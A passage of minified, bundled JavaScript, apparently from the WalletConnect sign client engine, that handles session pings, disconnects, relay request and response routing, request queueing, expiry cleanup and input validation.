                const t = await this.sendRequest(s, "wc_sessionPing", {}), { done: i, resolve: n, reject: o } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)();
                this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_ping", t), ({ error: a })=>{
                    a ? o(a) : n();
                }), await i();
            } else this.client.core.pairing.pairings.keys.includes(s) && await this.client.core.pairing.ping({
                topic: s
            });
        }, this.emit = async (e)=>{
            this.isInitialized(), await this.isValidEmit(e);
            const { topic: s, event: t, chainId: i } = e;
            await this.sendRequest(s, "wc_sessionEvent", {
                event: t,
                chainId: i
            });
        }, this.disconnect = async (e)=>{
            this.isInitialized(), await this.isValidDisconnect(e);
            const { topic: s } = e;
            if (this.client.session.keys.includes(s)) {
                const t = (0, $3bb3ddc7bbc938cc$export$799a3db5df197877)().toString();
                let i;
                const n = (o)=>{
                    o?.id.toString() === t && (this.client.core.relayer.events.removeListener((0, $e9e439c110f17033$export$d56245796e2837d).message_ack, n), i());
                };
                await Promise.all([
                    new Promise((o)=>{
                        i = o, this.client.core.relayer.on((0, $e9e439c110f17033$export$d56245796e2837d).message_ack, n);
                    }),
                    this.sendRequest(s, "wc_sessionDelete", (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED"), void 0, t)
                ]), await this.deleteSession(s);
            } else await this.client.core.pairing.disconnect({
                topic: s
            });
        }, this.find = (e)=>(this.isInitialized(), this.client.session.getAll().filter((s)=>(0, $a5d33cfc7f8e5437$export$6fc4971bf8f326a)(s, e))), this.getPendingSessionRequests = ()=>(this.isInitialized(), this.client.pendingRequest.getAll()), this.cleanupDuplicatePairings = async (e)=>{
            if (e.pairingTopic) try {
                const s = this.client.core.pairing.pairings.get(e.pairingTopic), t = this.client.core.pairing.pairings.getAll().filter((i)=>{
                    var n, o;
                    return ((n = i.peerMetadata) == null ? void 0 : n.url) && ((o = i.peerMetadata) == null ? void 0 : o.url) === e.peer.metadata.url && i.topic && i.topic !== s.topic;
                });
                if (t.length === 0) return;
                this.client.logger.info(`Cleaning up ${t.length} duplicate pairing(s)`), await Promise.all(t.map((i)=>this.client.core.pairing.disconnect({
                        topic: i.topic
                    }))), this.client.logger.info("Duplicate pairings clean up finished");
            } catch (s) {
                this.client.logger.error(s);
            }
        }, this.deleteSession = async (e, s)=>{
            const { self: t } = this.client.session.get(e);
            await this.client.core.relayer.unsubscribe(e), this.client.session.delete(e, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), this.client.core.crypto.keychain.has(t.publicKey) && await this.client.core.crypto.deleteKeyPair(t.publicKey), this.client.core.crypto.keychain.has(e) && await this.client.core.crypto.deleteSymKey(e), s || this.client.core.expirer.del(e), this.client.core.storage.removeItem($4a472e843fedf2e2$export$a26ccd6441b7d638).catch((i)=>this.client.logger.warn(i));
        }, this.deleteProposal = async (e, s)=>{
            await Promise.all([
                this.client.proposal.delete(e, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")),
                s ? Promise.resolve() : this.client.core.expirer.del(e)
            ]);
        }, this.deletePendingSessionRequest = async (e, s, t = !1)=>{
            await Promise.all([
                this.client.pendingRequest.delete(e, s),
                t ? Promise.resolve() : this.client.core.expirer.del(e)
            ]), this.requestQueue.requests = this.requestQueue.requests.filter((i)=>i.id !== e), t && (this.requestQueue.state = $4a472e843fedf2e2$export$a8430bf2cf90f262.idle);
        }, this.setExpiry = async (e, s)=>{
            this.client.session.keys.includes(e) && await this.client.session.update(e, {
                expiry: s
            }), this.client.core.expirer.set(e, s);
        }, this.setProposal = async (e, s)=>{
            await this.client.proposal.set(e, s), this.client.core.expirer.set(e, s.expiry);
        }, this.setPendingSessionRequest = async (e)=>{
            const s = $4a472e843fedf2e2$export$4edb1ca37014192d.wc_sessionRequest.req.ttl, { id: t, topic: i, params: n } = e;
            await this.client.pendingRequest.set(t, {
                id: t,
                topic: i,
                params: n
            }), s && this.client.core.expirer.set(t, (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)(s));
        }, this.sendRequest = async (e, s, t, i, n)=>{
            const o = (0, $3bb3ddc7bbc938cc$export$11d081ebb32d4398)(s, t);
            if ((0, $a5d33cfc7f8e5437$export$4e09c449d6c407f7)() && $4a472e843fedf2e2$export$63c37d8ae5931ad5.includes(s)) {
                const h = (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(JSON.stringify(o));
                await this.client.core.verify.register({
                    attestationId: h
                });
            }
            const a = await this.client.core.crypto.encode(e, o), l = $4a472e843fedf2e2$export$4edb1ca37014192d[s].req;
            return i && (l.ttl = i), n && (l.id = n), this.client.core.history.set(e, o), this.client.core.relayer.publish(e, a, l), o.id;
        }, this.sendResult = async (e, s, t)=>{
            const i = (0, $3bb3ddc7bbc938cc$export$478fdea01c2a3198)(e, t), n = await this.client.core.crypto.encode(s, i), o = await this.client.core.history.get(s, e), a = $4a472e843fedf2e2$export$4edb1ca37014192d[o.request.method].res;
            this.client.core.relayer.publish(s, n, a), await this.client.core.history.resolve(i);
        }, this.sendError = async (e, s, t)=>{
            const i = (0, $3bb3ddc7bbc938cc$export$9f7302ae26c3f77)(e, t), n = await this.client.core.crypto.encode(s, i), o = await this.client.core.history.get(s, e), a = $4a472e843fedf2e2$export$4edb1ca37014192d[o.request.method].res;
            this.client.core.relayer.publish(s, n, a), await this.client.core.history.resolve(i);
        }, this.cleanup = async ()=>{
            const e = [], s = [];
            this.client.session.getAll().forEach((t)=>{
                (0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(t.expiry) && e.push(t.topic);
            }), this.client.proposal.getAll().forEach((t)=>{
                (0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(t.expiry) && s.push(t.id);
            }), await Promise.all([
                ...e.map((t)=>this.deleteSession(t)),
                ...s.map((t)=>this.deleteProposal(t))
            ]);
        }, this.onRelayEventRequest = (e)=>{
            const { topic: s, payload: t } = e, i = t.method;
            switch(i){
                case "wc_sessionPropose":
                    return this.onSessionProposeRequest(s, t);
                case "wc_sessionSettle":
                    return this.onSessionSettleRequest(s, t);
                case "wc_sessionUpdate":
                    return this.onSessionUpdateRequest(s, t);
                case "wc_sessionExtend":
                    return this.onSessionExtendRequest(s, t);
                case "wc_sessionPing":
                    return this.onSessionPingRequest(s, t);
                case "wc_sessionDelete":
                    return this.onSessionDeleteRequest(s, t);
                case "wc_sessionRequest":
                    return this.onSessionRequest(s, t);
                case "wc_sessionEvent":
                    return this.onSessionEventRequest(s, t);
                default:
                    return this.client.logger.info(`Unsupported request method ${i}`);
            }
        }, this.onRelayEventResponse = async (e)=>{
            const { topic: s, payload: t } = e, i = (await this.client.core.history.get(s, t.id)).request.method;
            switch(i){
                case "wc_sessionPropose":
                    return this.onSessionProposeResponse(s, t);
                case "wc_sessionSettle":
                    return this.onSessionSettleResponse(s, t);
                case "wc_sessionUpdate":
                    return this.onSessionUpdateResponse(s, t);
                case "wc_sessionExtend":
                    return this.onSessionExtendResponse(s, t);
                case "wc_sessionPing":
                    return this.onSessionPingResponse(s, t);
                case "wc_sessionRequest":
                    return this.onSessionRequestResponse(s, t);
                default:
                    return this.client.logger.info(`Unsupported response method ${i}`);
            }
        }, this.onRelayEventUnknownPayload = (e)=>{
            const { topic: s } = e, { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `Decoded payload on topic ${s} is not identifiable as a JSON-RPC request or a response.`);
            throw new Error(t);
        }, this.onSessionProposeRequest = async (e, s)=>{
            const { params: t, id: i } = s;
            try {
                this.isValidConnect($4a472e843fedf2e2$var$w({}, s.params));
                const n = (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.FIVE_MINUTES)), o = $4a472e843fedf2e2$var$w({
                    id: i,
                    pairingTopic: e,
                    expiry: n
                }, t);
                await this.setProposal(i, o);
                const a = (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(JSON.stringify(s)), l = await this.getVerifyContext(a, o.proposer.metadata);
                this.client.events.emit("session_proposal", {
                    id: i,
                    params: o,
                    verifyContext: l
                });
            } catch (n) {
                await this.sendError(i, e, n), this.client.logger.error(n);
            }
        }, this.onSessionProposeResponse = async (e, s)=>{
            const { id: t } = s;
            if ((0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s)) {
                const { result: i } = s;
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    result: i
                });
                const n = this.client.proposal.get(t);
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    proposal: n
                });
                const o = n.proposer.publicKey;
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    selfPublicKey: o
                });
                const a = i.responderPublicKey;
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    peerPublicKey: a
                });
                const l = await this.client.core.crypto.generateSharedKey(o, a);
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    sessionTopic: l
                });
                const h = await this.client.core.relayer.subscribe(l);
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    subscriptionId: h
                }), await this.client.core.pairing.activate({
                    topic: e
                });
            } else (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && (await this.client.proposal.delete(t, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_connect"), {
                error: s.error
            }));
        }, this.onSessionSettleRequest = async (e, s)=>{
            const { id: t, params: i } = s;
            try {
                this.isValidSessionSettleRequest(i);
                const { relay: n, controller: o, expiry: a, namespaces: l, requiredNamespaces: h, optionalNamespaces: I, sessionProperties: g, pairingTopic: E } = s.params, u = $4a472e843fedf2e2$var$w({
                    topic: e,
                    relay: n,
                    expiry: a,
                    namespaces: l,
                    acknowledged: !0,
                    pairingTopic: E,
                    requiredNamespaces: h,
                    optionalNamespaces: I,
                    controller: o.publicKey,
                    self: {
                        publicKey: "",
                        metadata: this.client.metadata
                    },
                    peer: {
                        publicKey: o.publicKey,
                        metadata: o.metadata
                    }
                }, g && {
                    sessionProperties: g
                });
                await this.sendResult(s.id, e, !0), this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_connect"), {
                    session: u
                }), this.cleanupDuplicatePairings(u);
            } catch (n) {
                await this.sendError(t, e, n), this.client.logger.error(n);
            }
        }, this.onSessionSettleResponse = async (e, s)=>{
            const { id: t } = s;
            (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? (await this.client.session.update(e, {
                acknowledged: !0
            }), this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_approve", t), {})) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && (await this.client.session.delete(e, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_approve", t), {
                error: s.error
            }));
        }, this.onSessionUpdateRequest = async (e, s)=>{
            const { params: t, id: i } = s;
            try {
                this.isValidUpdate($4a472e843fedf2e2$var$w({
                    topic: e
                }, t)), await this.client.session.update(e, {
                    namespaces: t.namespaces
                }), await this.sendResult(i, e, !0), this.client.events.emit("session_update", {
                    id: i,
                    topic: e,
                    params: t
                });
            } catch (n) {
                await this.sendError(i, e, n), this.client.logger.error(n);
            }
        }, this.onSessionUpdateResponse = (e, s)=>{
            const { id: t } = s;
            (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_update", t), {}) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_update", t), {
                error: s.error
            });
        }, this.onSessionExtendRequest = async (e, s)=>{
            const { id: t } = s;
            try {
                this.isValidExtend({
                    topic: e
                }), await this.setExpiry(e, (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)($4a472e843fedf2e2$export$84b1b9dbcdea0475)), await this.sendResult(t, e, !0), this.client.events.emit("session_extend", {
                    id: t,
                    topic: e
                });
            } catch (i) {
                await this.sendError(t, e, i), this.client.logger.error(i);
            }
        }, this.onSessionExtendResponse = (e, s)=>{
            const { id: t } = s;
            (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_extend", t), {}) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_extend", t), {
                error: s.error
            });
        }, this.onSessionPingRequest = async (e, s)=>{
            const { id: t } = s;
            try {
                this.isValidPing({
                    topic: e
                }), await this.sendResult(t, e, !0), this.client.events.emit("session_ping", {
                    id: t,
                    topic: e
                });
            } catch (i) {
                await this.sendError(t, e, i), this.client.logger.error(i);
            }
        }, this.onSessionPingResponse = (e, s)=>{
            const { id: t } = s;
            setTimeout(()=>{
                (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_ping", t), {}) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_ping", t), {
                    error: s.error
                });
            }, 500);
        }, this.onSessionDeleteRequest = async (e, s)=>{
            const { id: t } = s;
            try {
                this.isValidDisconnect({
                    topic: e,
                    reason: s.params
                }), await Promise.all([
                    new Promise((i)=>{
                        this.client.core.relayer.once((0, $e9e439c110f17033$export$d56245796e2837d).publish, async ()=>{
                            i(await this.deleteSession(e));
                        });
                    }),
                    this.sendResult(t, e, !0)
                ]), this.client.events.emit("session_delete", {
                    id: t,
                    topic: e
                });
            } catch (i) {
                this.client.logger.error(i);
            }
        }, this.onSessionRequest = async (e, s)=>{
            const { id: t, params: i } = s;
            try {
                this.isValidRequest($4a472e843fedf2e2$var$w({
                    topic: e
                }, i)), await this.setPendingSessionRequest({
                    id: t,
                    topic: e,
                    params: i
                }), this.addRequestToQueue({
                    id: t,
                    topic: e,
                    params: i
                }), await this.processRequestQueue();
            } catch (n) {
                await this.sendError(t, e, n), this.client.logger.error(n);
            }
        }, this.onSessionRequestResponse = (e, s)=>{
            const { id: t } = s;
            (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_request", t), {
                result: s.result
            }) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_request", t), {
                error: s.error
            });
        }, this.onSessionEventRequest = async (e, s)=>{
            const { id: t, params: i } = s;
            try {
                this.isValidEmit($4a472e843fedf2e2$var$w({
                    topic: e
                }, i)), this.client.events.emit("session_event", {
                    id: t,
                    topic: e,
                    params: i
                });
            } catch (n) {
                await this.sendError(t, e, n), this.client.logger.error(n);
            }
        }, this.addRequestToQueue = (e)=>{
            this.requestQueue.requests.push(e);
        }, this.cleanupAfterResponse = (e)=>{
            this.deletePendingSessionRequest(e.response.id, {
                message: "fulfilled",
                code: 0
            }), setTimeout(()=>{
                this.requestQueue.state = $4a472e843fedf2e2$export$a8430bf2cf90f262.idle, this.processRequestQueue();
            }, (0, $aG48A.toMiliseconds)(this.requestQueueDelay));
        }, this.processRequestQueue = async ()=>{
            if (this.requestQueue.state === $4a472e843fedf2e2$export$a8430bf2cf90f262.active) {
                this.client.logger.info("session request queue is already active.");
                return;
            }
            const e = this.requestQueue.requests[0];
            if (!e) {
                this.client.logger.info("session request queue is empty.");
                return;
            }
            try {
                const { id: s, topic: t, params: i } = e, n = (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(JSON.stringify({
                    id: s,
                    params: i
                })), o = this.client.session.get(t), a = await this.getVerifyContext(n, o.peer.metadata);
                this.requestQueue.state = $4a472e843fedf2e2$export$a8430bf2cf90f262.active, this.client.events.emit("session_request", {
                    id: s,
                    topic: t,
                    params: i,
                    verifyContext: a
                });
            } catch (s) {
                this.client.logger.error(s);
            }
        }, this.isValidConnect = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `connect() params: ${JSON.stringify(e)}`);
                throw new Error(a);
            }
            const { pairingTopic: s, requiredNamespaces: t, optionalNamespaces: i, sessionProperties: n, relays: o } = e;
            if ((0, $a5d33cfc7f8e5437$export$fce6876652108ab)(s) || await this.isValidPairingTopic(s), !(0, $a5d33cfc7f8e5437$export$6294c30b976bd21e)(o, !0)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `connect() relays: ${o}`);
                throw new Error(a);
            }
            !(0, $a5d33cfc7f8e5437$export$fce6876652108ab)(t) && (0, $a5d33cfc7f8e5437$export$16a0268bc22b47b0)(t) !== 0 && this.validateNamespaces(t, "requiredNamespaces"), !(0, $a5d33cfc7f8e5437$export$fce6876652108ab)(i) && (0, $a5d33cfc7f8e5437$export$16a0268bc22b47b0)(i) !== 0 && this.validateNamespaces(i, "optionalNamespaces"), (0, $a5d33cfc7f8e5437$export$fce6876652108ab)(n) || this.validateSessionProps(n, "sessionProperties");
        }, this.validateNamespaces = (e, s)=>{
            const t = (0, $a5d33cfc7f8e5437$export$9e2b2cae22c6a8b3)(e, "connect()", s);
            if (t) throw new Error(t.message);
        }, this.isValidApprove = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) throw new Error((0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `approve() params: ${e}`).message);
            const { id: s, namespaces: t, relayProtocol: i, sessionProperties: n } = e;
            await this.isValidProposalId(s);
            const o = this.client.proposal.get(s), a = (0, $a5d33cfc7f8e5437$export$93f7b81dc815a714)(t, "approve()");
            if (a) throw new Error(a.message);
            const l = (0, $a5d33cfc7f8e5437$export$ba5b0a4b585cd1b4)(o.requiredNamespaces, t, "approve()");
            if (l) throw new Error(l.message);
            if (!(0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(i, !0)) {
                const { message: h } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `approve() relayProtocol: ${i}`);
                throw new Error(h);
            }
            (0, $a5d33cfc7f8e5437$export$fce6876652108ab)(n) || this.validateSessionProps(n, "sessionProperties");
        }, this.isValidReject = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `reject() params: ${e}`);
                throw new Error(i);
            }
            const { id: s, reason: t } = e;
            if (await this.isValidProposalId(s), !(0, $a5d33cfc7f8e5437$export$766fe78377d96f2a)(t)) {
                const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `reject() reason: ${JSON.stringify(t)}`);
                throw new Error(i);
            }
        }, this.isValidSessionSettleRequest = (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: l } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `onSessionSettleRequest() params: ${e}`);
                throw new Error(l);
            }
            const { relay: s, controller: t, namespaces: i, expiry: n } = e;
            if (!(0, $a5d33cfc7f8e5437$export$1b3fc298be8c9a7b)(s)) {
                const { message: l } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", "onSessionSettleRequest() relay protocol should be a string");
                throw new Error(l);
            }
            const o = (0, $a5d33cfc7f8e5437$export$5e1c5c89613c213f)(t, "onSessionSettleRequest()");
            if (o) throw new Error(o.message);
            const a = (0, $a5d33cfc7f8e5437$export$93f7b81dc815a714)(i, "onSessionSettleRequest()");
            if (a) throw new Error(a.message);
            if ((0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(n)) {
                const { message: l } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED", "onSessionSettleRequest()");
                throw new Error(l);
            }
        }, this.isValidUpdate = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `update() params: ${e}`);
                throw new Error(a);
            }
            const { topic: s, namespaces: t } = e;
            await this.isValidSessionTopic(s);
            const i = this.client.session.get(s), n = (0, $a5d33cfc7f8e5437$export$93f7b81dc815a714)(t, "update()");
            if (n) throw new Error(n.message);
            const o = (0, $a5d33cfc7f8e5437$export$ba5b0a4b585cd1b4)(i.requiredNamespaces, t, "update()");
            if (o) throw new Error(o.message);
        }, this.isValidExtend = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `extend() params: ${e}`);
                throw new Error(t);
            }
            const { topic: s } = e;
            await this.isValidSessionTopic(s);
        }, this.isValidRequest = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `request() params: ${e}`);
                throw new Error(a);
            }
            const { topic: s, request: t, chainId: i, expiry: n } = e;
            await this.isValidSessionTopic(s);
            const { namespaces: o } = this.client.session.get(s);
            if (!(0, $a5d33cfc7f8e5437$export$144fc36610eb6522)(o, i)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `request() chainId: ${i}`);
                throw new Error(a);
            }
            if (!(0, $a5d33cfc7f8e5437$export$1a2af3c017fb6d42)(t)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `request() ${JSON.stringify(t)}`);
                throw new Error(a);
            }
            if (!(0, $a5d33cfc7f8e5437$export$8db4804e3a6de711)(o, i, t.method)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `request() method: ${t.method}`);
                throw new Error(a);
            }
            if (n && !(0, $a5d33cfc7f8e5437$export$59fba2af1ac782b)(n, $4a472e843fedf2e2$export$409f0c0a13a1b7c6)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `request() expiry: ${n}. Expiry must be a number (in seconds) between ${$4a472e843fedf2e2$export$409f0c0a13a1b7c6.min} and ${$4a472e843fedf2e2$export$409f0c0a13a1b7c6.max}`);
                throw new Error(a);
            }
        }, this.isValidRespond = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `respond() params: ${e}`);
                throw new Error(i);
            }
            const { topic: s, response: t } = e;
            if (await this.isValidSessionTopic(s), !(0, $a5d33cfc7f8e5437$export$1ae38cf0a848f651)(t)) {
                const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `respond() response: ${JSON.stringify(t)}`);
                throw new Error(i);
            }
        }, this.isValidPing = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `ping() params: ${e}`);
                throw new Error(t);
            }
            const { topic: s } = e;
            await this.isValidSessionOrPairingTopic(s);
        }, this.isValidEmit = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: o } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `emit() params: ${e}`);
                throw new Error(o);
            }
            const { topic: s, event: t, chainId: i } = e;
            await this.isValidSessionTopic(s);
            const { namespaces: n } = this.client.session.get(s);
            if (!(0, $a5d33cfc7f8e5437$export$144fc36610eb6522)(n, i)) {
                const { message: o } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `emit() chainId: ${i}`);
                throw new Error(o);
            }
            if (!(0, $a5d33cfc7f8e5437$export$cbe4cdc5960cfa11)(t)) {
                const { message: o } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `emit() event: ${JSON.stringify(t)}`);
                throw new Error(o);
            }
            if (!(0, $a5d33cfc7f8e5437$export$df2c67ef8baad16b)(n, i, t.name)) {
                const { message: o } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `emit() event: ${JSON.stringify(t)}`);
                throw new Error(o);
            }
        }, this.isValidDisconnect = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `disconnect() params: ${e}`);
                throw new Error(t);
            }
            const { topic: s } = e;
            await this.isValidSessionOrPairingTopic(s);
        }, this.getVerifyContext = async (e, s)=>{
            const t = {
                verified: {
                    verifyUrl: s.verifyUrl || "",
                    validation: "UNKNOWN",
                    origin: s.url || ""
                }
            };
            try {
                const i = await this.client.core.verify.resolve({
                    attestationId: e,
                    verifyUrl: s.verifyUrl
                });
                i && (t.verified.origin = i, t.verified.validation = i === s.url ? "VALID" : "INVALID");
            } catch (i) {
                this.client.logger.error(i);
            }
            return this.client.logger.info(`Verify context: ${JSON.stringify(t)}`), t;
        }, this.validateSessionProps = (e, s)=>{
            Object.values(e).forEach((t)=>{
                if (!(0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(t, !1)) {
                    const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `${s} must be in Record<string, string> format. Received: ${JSON.stringify(t)}`);
                    throw new Error(i);
                }
            });
        };
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: r } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(r);
        }
    }
    registerRelayerEvents() {
        this.client.core.relayer.on((0, $e9e439c110f17033$export$d56245796e2837d).message, async (r)=>{
            const { topic: e, message: s } = r;
            if (this.ignoredPayloadTypes.includes(this.client.core.crypto.getPayloadType(s))) return;
            const t = await this.client.core.crypto.decode(e, s);
            try {
                (0, $2e45abd1d679ec32$export$f6e4034abe07d2a5)(t) ? (this.client.core.history.set(e, t), this.onRelayEventRequest({
                    topic: e,
                    payload: t
                })) : (0, $2e45abd1d679ec32$export$308ba927de2bcbe8)(t) ? (await this.client.core.history.resolve(t), await this.onRelayEventResponse({
                    topic: e,
                    payload: t
                }), this.client.core.history.delete(e, t.id)) : this.onRelayEventUnknownPayload({
                    topic: e,
                    payload: t
                });
            } catch (i) {
                this.client.logger.error(i);
            }
        });
    }
    registerExpirerEvents() {
        this.client.core.expirer.on((0, $e9e439c110f17033$export$9013719d9206b0c1).expired, async (r)=>{
            const { topic: e, id: s } = (0, $a5d33cfc7f8e5437$export$93adeb0f16e8e51d)(r.target);
            if (s && this.client.pendingRequest.keys.includes(s)) return await this.deletePendingSessionRequest(s, (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED"), !0);
            e ? this.client.session.keys.includes(e) && (await this.deleteSession(e, !0), this.client.events.emit("session_expire", {
                topic: e
            })) : s && (await this.deleteProposal(s, !0), this.client.events.emit("proposal_expire", {
                id: s
            }));
        });
    }
    isValidPairingTopic(r) {
        if (!(0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(r, !1)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `pairing topic should be a string: ${r}`);
            throw new Error(e);
        }
        if (!this.client.core.pairing.pairings.keys.includes(r)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `pairing topic doesn't exist: ${r}`);
            throw new Error(e);
        }
        if ((0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(this.client.core.pairing.pairings.get(r).expiry)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED", `pairing topic: ${r}`);
            throw new Error(e);
        }
    }
    async isValidSessionTopic(r) {
        if (!(0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(r, !1)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `session topic should be a string: ${r}`);
            throw new Error(e);
        }
        if (!this.client.session.keys.includes(r)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `session topic doesn't exist: ${r}`);
            throw new Error(e);
        }
        if ((0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(this.client.session.get(r).expiry)) {
            await this.deleteSession(r);
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED", `session topic: ${r}`);
            throw new Error(e);
        }
    }
